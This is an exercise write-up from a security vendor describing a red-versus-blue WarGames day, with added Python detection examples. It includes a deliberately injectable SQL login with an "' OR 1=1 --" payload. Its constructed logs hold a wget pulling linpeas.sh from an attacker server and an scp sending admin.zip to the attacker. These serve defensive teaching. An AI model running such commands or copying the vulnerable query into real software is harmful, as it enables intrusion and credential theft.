
USE CASE: Blitz WarGames

This use case is a summary of the Blitz WarGames, which was organized during the TEHTRIS week in France.

We partnered with Whaller to provide our players with a French sovereign collaboration platform, so that they could work together as teams throughout the day.

About the event:

In a fully remote exercise, a cyber war was simulated between a Red team (attackers) and a Blue team (defenders) over the course of a day. The exercise was deliberately asynchronous: the attackers had a full morning to work without interference from the Blue team, and the Blue team spent the afternoon on the forensic investigation.

On the 14th of June 2023, 4 Red team players faced 7 Blue team players, who were assisted by the TEHTRIS Purple team.

Partnership with Whaller

To include players from different entities and ensure smooth communication throughout the event, TEHTRIS partnered with Whaller, a French company which shares TEHTRIS’ ethics and values. Whaller was the first company to obtain the « Sovereign Solution » (Privacy Tech) label, which certifies French software vendors that take data protection seriously.

We thank again our partner for this opportunity to play with them!

In the attackers’ shoes…

The Red team stumbles upon a message that was recently posted on the dark web and sees an opportunity to make money…

Calling for assistance!

Our Blue team is alerted after the client notices suspicious activity on the XDR Platform: acting as an incident response team, they have to investigate…

The infrastructure of the Blitz WarGames: the victim company’s network

The WebApp was set to a detection-only configuration, while the targeted Windows host was set to remediation mode. The difference matters: in detection-only mode an alert is raised but the action is not blocked, whereas remediation mode stops it. This was done to illustrate how vital configuration settings are when deploying cybersecurity tools on an infrastructure.

Unfolding the Blitz WarGames following the cyber kill chain

Reconnaissance (TA0043)

Scanning tools

The Red team used several scanning tools to gather information for further targeting: Nmap (Network Mapper), an open-source network discovery tool that identifies hosts on the network and the open ports on each of them; Fuzz Faster U Fool (FFUF), a web fuzzer used to discover hidden paths and parameters; and Nikto, a popular web server vulnerability scanner that reports known weaknesses along with the CVE identifiers associated with them.

With Nmap, they found 3 hosts with open ports.

Getting distracted… by honeypots!

These scans returned information from TEHTRIS Deceptive Response, a honeypot set up to distract attackers and act as an early warning system for security analysts. And it worked like a charm!

The Red team lost time investigating the honeypot, which strengthened the signal on the Blue team’s side: any access to a decoy should always be investigated, since no legitimate user has a reason to touch it.

The Purple team finally stepped in to guide them through the exercise:

Purple team message on Whaller for the Red team : “Dark Soldier has a source… It seems like a neglected cmaps website is hosted on one of the machines…”

Back to business!

Once back on track and focused on the right host, the Red team found the version of the website:

… and found that it was vulnerable to CVE-2023-29809, a SQL injection vulnerability allowing attackers to run arbitrary SQL queries against the application’s database.

Blue team’s perspective

On the Blue team’s side, the honeypots played their role perfectly and acted as an early alarm:

Blue team message on Whaller:
NB: “FYI, while checking the logs of the Deceptive Response, I probably identified a port scan on 10.2.8.8 from source IP 10.2.8.2 (possibly an attacker’s IP)”
TP: “Use of Nikto at 10:50AM from IP 10.2.8.2 towards 10.2.8.8, captured by the honeypot”

Network scanning with Nmap and Fuzz Faster U Fool, as well as the Nikto web server vulnerability scan, were detected by TEHTRIS NTA (Network Traffic Analysis):

TEHTRIS XDR Platform – NTA alerts
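As an added example (not part of the original write-up and not TEHTRIS code), the following Python script shows the two signals described above over constructed log lines: every source that touches the decoy is listed, sources hitting many distinct ports on it within a short window are flagged as port scanners, and web requests carrying the default Nikto or FFUF User-Agent are flagged. The log formats, the thresholds, the tool list and every IP address other than 10.2.8.2 and 10.2.8.8 (quoted from the Blue team messages) are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed honeypot connection log (not real Deceptive Response output).
# Format: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port>"
HONEYPOT_LOG = """\
2023-06-14T10:41:02 10.2.8.2 -> 10.2.8.8:21
2023-06-14T10:41:02 10.2.8.2 -> 10.2.8.8:22
2023-06-14T10:41:02 10.2.8.2 -> 10.2.8.8:23
2023-06-14T10:41:02 10.2.8.2 -> 10.2.8.8:25
2023-06-14T10:41:02 10.2.8.2 -> 10.2.8.8:53
2023-06-14T10:41:03 10.2.8.2 -> 10.2.8.8:80
2023-06-14T10:41:03 10.2.8.2 -> 10.2.8.8:110
2023-06-14T10:41:03 10.2.8.2 -> 10.2.8.8:139
2023-06-14T10:41:03 10.2.8.2 -> 10.2.8.8:443
2023-06-14T10:41:03 10.2.8.2 -> 10.2.8.8:445
2023-06-14T10:41:04 10.2.8.2 -> 10.2.8.8:3306
2023-06-14T10:41:04 10.2.8.2 -> 10.2.8.8:8080
2023-06-14T10:45:10 10.2.8.5 -> 10.2.8.8:80
"""

# Constructed web-server access log in Apache combined format.
HTTP_LOG = """\
10.2.8.5 - - [14/Jun/2023:10:45:10 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0"
10.2.8.2 - - [14/Jun/2023:10:50:01 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 162 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
10.2.8.2 - - [14/Jun/2023:10:50:02 +0200] "GET /admin/ HTTP/1.1" 404 162 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)"
10.2.8.2 - - [14/Jun/2023:10:52:15 +0200] "GET /backup HTTP/1.1" 404 162 "-" "Fuzz Faster U Fool v2.0.0"
"""

CONN_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+)$")
HTTP_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d+ \S+ "[^"]*" "([^"]*)"$')
# Default User-Agent strings of the scanners seen in the exercise (operators can change them).
SCANNER_UA_RE = re.compile(r"(Nikto/[\d.]+|Fuzz Faster U Fool v[\d.]+|sqlmap/[\d.]+)")


def parse_honeypot_log(text):
    """Turn the connection log into (timestamp, src, dst, port) tuples."""
    events = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            ts = datetime.fromisoformat(m.group(1))
            events.append((ts, m.group(2), m.group(3), int(m.group(4))))
    return events


def honeypot_touches(events):
    """Every source that contacted the decoy: each one is worth an investigation."""
    return sorted({src for _, src, _, _ in events})


def detect_port_scans(events, min_ports=10, window=timedelta(seconds=60)):
    """Sources that hit at least min_ports distinct ports on one decoy within `window`
    (sliding window over the sorted timestamps of each source/destination pair)."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in events:
        by_pair[(src, dst)].append((ts, port))
    scanners = set()
    for (src, _dst), hits in by_pair.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - start <= window}
            if len(ports) >= min_ports:
                scanners.add(src)
                break
    return sorted(scanners)


def detect_scanner_user_agents(text):
    """(src_ip, tool) for each request whose User-Agent matches a known scanner default."""
    found = []
    for line in text.splitlines():
        m = HTTP_RE.match(line)
        if not m:
            continue
        src, user_agent = m.group(1), m.group(2)
        s = SCANNER_UA_RE.search(user_agent)
        if s:
            found.append((src, s.group(1)))
    return found


if __name__ == "__main__":
    events = parse_honeypot_log(HONEYPOT_LOG)
    print("decoy touched by:", honeypot_touches(events))
    print("port scanners:", detect_port_scans(events))
    print("scanner user agents:", detect_scanner_user_agents(HTTP_LOG))
```

Note the difference between the two kinds of signal: the User-Agent matches only catch tools left on their default configuration (both Nikto and FFUF let the operator set any header), whereas the decoy touch needs no signature at all, which is exactly why the honeypot produced such a clean early alarm during the exercise. In the constructed log, 10.2.8.5 is not a port scanner but still appears in the list of touches and should be looked at.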

Initial Access (TA0001)

Exploit of CVE-2023-29809

The Red team exploited the SQL injection vulnerability (T1190, Exploit Public-Facing Application) using sqlmap, a popular tool that automates the detection and exploitation of SQL injection flaws.

This gave them access to the users table stored in the website’s database, and thus to credentials…

… which they used to establish an SSH connection to the victim’s Linux server.
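To make the exploited weakness concrete, here is an added example (not the vulnerable application’s code, whose source is not shown on this page, and not TEHTRIS code) of a login query built by string concatenation next to its parameterized form, run against an in-memory SQLite database. The table layout, the sample credentials and the payload are assumptions for the example.

```python
import sqlite3


def build_db():
    """Constructed users table; the plaintext passwords mimic the worst case the scenario relies on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("victorh", "S3cret!"), ("webadmin", "Adm1n-pass")],  # constructed sample rows
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text, so a quote in the input rewrites the query."""
    query = (
        "SELECT username, password FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_hardened(conn, username, password):
    """Fixed: bound parameters travel separately from the SQL text and are never parsed as SQL."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


# Tautology payload of the kind sqlmap tries first: the closing quote ends the string literal,
# OR 1=1 makes the WHERE clause true for every row, and the SQL comment discards the password check.
PAYLOAD = "' OR 1=1 --"


def demo():
    """Run the same payload through both versions and a legitimate login through the fixed one."""
    conn = build_db()
    return {
        "vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),
        "hardened": login_hardened(conn, PAYLOAD, "anything"),
        "legit": login_hardened(conn, "victorh", "S3cret!"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable version returns the whole users table for the payload, which is the dump the Red team obtained; the parameterized version returns nothing for it and still authenticates the real user. Hashing the stored passwords with a slow KDF would not have prevented the dump, but it would have prevented the direct reuse of the credentials over SSH, which is the step that turned the injection into a foothold.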

Incident response team: where to start?

Remember that the Blue team was called in to handle an emergency for a third party: in this scenario, they know neither what the infrastructure looks like nor which vulnerabilities it may contain.

They therefore decided to check for the most common attacks against a web server, such as SQL injection, cross-site scripting (XSS) and Local File Inclusion (LFI).

An SQL injection attempt was detected by TEHTRIS NTA.

TEHTRIS XDR Platform

The SSH connection is visible in TEHTRIS SIEM, giving the Blue team information on the user victorh, through whose account the attackers gained a foothold on the server:

Discovery (TA0007) & Credential Access (TA0006)

Gaining information on the environment…

Once on the Linux server, the Red team ran LinPEAS to enumerate privilege escalation paths. Then, while browsing the file system from victorh’s session, the Red team found the file admin.zip at /home/webadmin/.admin/admin.zip.

Red team on Whaller: “I see a webadmin user on the machine. victorh@ -ubuntu2204:/home/.admin$ is admin.zip”

They brute-forced the password of the zip archive to reveal admin.txt.

…Spotted by the Blue team

In the raw data of TEHTRIS NTA, the Blue team found events indicating the transfer of a bash script called linpeas.sh, fetched with the wget utility from a server listening on port 8000.

TEHTRIS XDR Platform

TEHTRIS EDR raised alerts on the command lines executed by LinPEAS:

TEHTRIS XDR Platform

The Blue team saw that the user ran the groups command, probably to check whether he belonged to the sudo group. From the find commands, the Blue team concluded that the victorh user did not have access to many folders on the system.

The Blue team then observed scp and cp commands used to copy the file admin.zip to the attacker’s system.

TEHTRIS XDR Platform

Lateral Movement (TA0008) and Privilege Escalation (TA0004) attempt

Targeting the Windows machine

Inside the admin.txt file, the Red team found credentials for a Windows machine (whose IP address had already been identified by the Nmap scan):

Once on the Windows host, the Red team used Metasploit to try to escalate privileges in the hope of completing the mission. However, they could not go any further.

Automatic remediation by TEHTRIS EPP

TEHTRIS EPP automatically terminated the Metasploit process on the Windows host:

TEHTRIS XDR Platform – EPP alert

With TEHTRIS NTA, the Blue team spotted that the attackers used Python’s built-in HTTP server module (SimpleHTTPServer, called http.server in Python 3) to transfer the file.

TEHTRIS XDR Platform – NTA alert
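Bringing together the host and network observations from the Linux phase (the wget of linpeas.sh from port 8000, the LinPEAS command lines, the scp of admin.zip) and the Python HTTP server noted just above, here is an added example (not TEHTRIS EDR or NTA logic) of the detection rules a Blue team could write over constructed process-creation and HTTP-metadata events, with a correlation step tying the tool download to the staging server. The event format, the allowlisted backup host 10.2.8.20, the host name ubuntu2204 and the tool-name list are assumptions for the example; the attacker IP 10.2.8.2 and the path of admin.zip come from the write-up. The Server header value relies on the fact that Python’s http.server announces itself as "SimpleHTTP/0.6 Python/<version>".

```python
import re
from urllib.parse import urlparse

# Constructed process-creation telemetry: "<ISO time>|<host>|<user>|<command line>"
PROCESS_EVENTS = """\
2023-06-14T11:02:11|ubuntu2204|victorh|wget http://10.2.8.2:8000/linpeas.sh
2023-06-14T11:02:30|ubuntu2204|victorh|/bin/bash ./linpeas.sh
2023-06-14T11:02:31|ubuntu2204|victorh|id
2023-06-14T11:02:31|ubuntu2204|victorh|groups victorh
2023-06-14T11:02:32|ubuntu2204|victorh|find / -writable -type d
2023-06-14T11:20:05|ubuntu2204|victorh|cp /home/webadmin/.admin/admin.zip /tmp/admin.zip
2023-06-14T11:20:40|ubuntu2204|victorh|scp /tmp/admin.zip attacker@10.2.8.2:/loot/
2023-06-14T11:25:00|ubuntu2204|webadmin|scp /var/backups/site.tgz backup@10.2.8.20:/srv/backups/
2023-06-14T11:30:00|ubuntu2204|root|/usr/bin/apt-get update
"""

# Constructed HTTP metadata as a network sensor would log it:
# "<ISO time>|<src>|<dst>|<dst_port>|<request>|<Server header>"
HTTP_EVENTS = """\
2023-06-14T11:02:11|10.2.8.8|10.2.8.2|8000|GET /linpeas.sh|SimpleHTTP/0.6 Python/3.11.4
2023-06-14T11:40:00|10.2.8.30|10.2.8.8|443|GET /api/health|nginx/1.24.0
"""

TOOL_NAMES = ("linpeas", "winpeas", "linenum", "pspy", "mimikatz")  # assumption: watched tooling
ALLOWED_SCP_HOSTS = {"10.2.8.20"}  # assumption: the only legitimate destination for scp uploads
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b.*?(https?://\S+)")
# "scp [options] <local path> [user@]<host>:<remote path>" (uploads only)
SCP_RE = re.compile(r"^scp\s+(?:-\S+\s+)*(\S+)\s+(?:\S+@)?([^:\s]+):")


def parse_events(text):
    """Split the pipe-delimited constructed events into field lists."""
    return [line.split("|") for line in text.splitlines() if line.strip()]


def detect_process_events(text):
    """Return (rule, time, user, detail) alerts derived from process command lines."""
    alerts = []
    for ts, _host, user, cmd in parse_events(text):
        m = DOWNLOAD_RE.search(cmd)
        if m:
            url = urlparse(m.group(1))
            filename = url.path.rsplit("/", 1)[-1].lower()
            # Known tooling by name, or any fetch from a non-standard port (ad hoc staging server)
            if any(t in filename for t in TOOL_NAMES) or url.port not in (None, 80, 443):
                alerts.append(("tool_download", ts, user, m.group(1)))
        elif any(t in cmd.lower() for t in TOOL_NAMES):
            alerts.append(("privesc_enum", ts, user, cmd))
        m = SCP_RE.match(cmd)
        if m and m.group(2) not in ALLOWED_SCP_HOSTS:
            alerts.append(("exfil_scp", ts, user, f"{m.group(1)} -> {m.group(2)}"))
    return alerts


def detect_http_metadata(text):
    """Flag servers announcing themselves as Python's built-in http.server."""
    alerts = []
    for ts, src, dst, port, request, server in parse_events(text):
        if server.startswith("SimpleHTTP/"):
            alerts.append(("python_http_server", ts, src, f"{dst}:{port}", request))
    return alerts


def correlate(process_alerts, http_alerts):
    """Tool downloads whose origin host:port the network sensor saw answering as a Python http.server."""
    staging = {a[3] for a in http_alerts if a[0] == "python_http_server"}
    hits = []
    for rule, ts, user, url in process_alerts:
        if rule == "tool_download":
            u = urlparse(url)
            if f"{u.hostname}:{u.port}" in staging:
                hits.append((ts, user, url))
    return hits


if __name__ == "__main__":
    process_alerts = detect_process_events(PROCESS_EVENTS)
    http_alerts = detect_http_metadata(HTTP_EVENTS)
    for alert in process_alerts + http_alerts:
        print(alert)
    print("download served by a Python http.server:", correlate(process_alerts, http_alerts))
```

The scp rule deliberately uses an allowlist of destinations rather than a blocklist: the legitimate backup transfer by webadmin stays silent while the upload of admin.zip to 10.2.8.2 is flagged, and a new attacker host needs no rule update to be caught. The correlation step is what turns two medium-confidence alerts (a download from an unusual port, a Python web server on the network) into one high-confidence finding.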

Conclusions

The Red team did not succeed in retrieving the secret Dark Soldier asked for!

  My first is a body part that is said to mirror the heart
  My second is a definite article (most frequently used)
  My third is the number one in the country of tehtris
  My fourth is in appreciation but not in association
  My fifth is plural latin for words of wisdom
  My last is french slang for money
  The answer is what drives tehtris
The sensitive file placed on the Windows host, which had to be retrieved to finish the mission

Still, valuable lessons were learned…

On the one hand, the first phase of the attack illustrated how useful honeypots are. Acting as early alarms with virtually no false positives (no legitimate user has any reason to interact with a decoy), they are a considerable help to Blue teamers in identifying attackers. TEHTRIS has set up a research program to monitor Internet background noise and identify trends among threat actors: find out more here.

On the other hand, the scenario shows the importance of configuring cybersecurity tools correctly for the environment they protect. The web application left in detection-only mode raised alerts but let the attack proceed, whereas the remediation mode on the Windows host is what actually stopped the Red team. The methodology for fine-tuning one’s configuration to make the most of the XDR’s remediation capabilities is therefore of critical importance.

TEHTRIS solutions protect against different types of threats and play an active role in keeping sensitive data safe. The variety of tools helps monitor all types of IT networks, set up according to different parameters and constraints, while reducing the attack surface.

Feedback from the players

L’évènement était top! Hâte de voir le prochain event 🙂
(The event was great! Can’t wait to see the next one :))

SOC Engineer – POST Group

Hâte de participer au suivant 😉
(Can’t wait to play in the next event ;))        

Cybersecurity Consultant – TEHTRIS

Join us for the next WarGames

At TEHTRIS, we believe CTF-like events are both educational and informative. By impersonating threat actors and practicing investigation on a realistic attack, we can all benefit from each other’s expertise while having fun!

Are you one of our partners or clients, and would you like to participate in a WarGames exercise this year? Please contact us for more information!